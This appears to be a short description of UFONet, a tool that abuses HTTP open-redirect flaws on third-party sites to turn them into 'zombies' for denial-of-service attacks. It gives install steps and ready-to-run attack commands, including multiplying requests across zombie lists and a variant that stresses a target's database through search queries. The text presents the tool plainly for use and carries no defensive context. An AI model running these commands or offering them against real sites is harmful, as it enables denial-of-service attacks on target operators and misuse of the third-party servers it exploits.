It abuses OSI Layer 7-HTTP to create/manage ‘zombies’ and to conduct different attacks using; GET/POST, multi-threading, proxies, origin spoofing methods, cache evasion techniques, etc.
UFONet runs on many platforms. It requires Python (2.x.y) and the following libraries:
python-pycurl – Python bindings to libcurl
python-geoip – Python bindings for the GeoIP IP-to-country resolver library
On Debian-based systems (ex: Ubuntu), run:
sudo apt-get install python-pycurl python-geoip
Attacking a target:
Enter a target to attack with a number of rounds:
./ufonet -a http://target.com -r 10
On this example UFONet will attacks the target a number of 10 times for each ‘zombie’. That means that if you have a list of 1.000 ‘zombies’ it will launch 1.000 ‘zombies’ x 10 rounds = 10.000 requests to the target.
UFONet uses different ways to exploit ‘Open Redirect’ vulnerabilities. For example: You can use UFONet to stress database on target by requesting random valid strings like search queries:
./ufonet -a http://target.com –db “search.php?q=”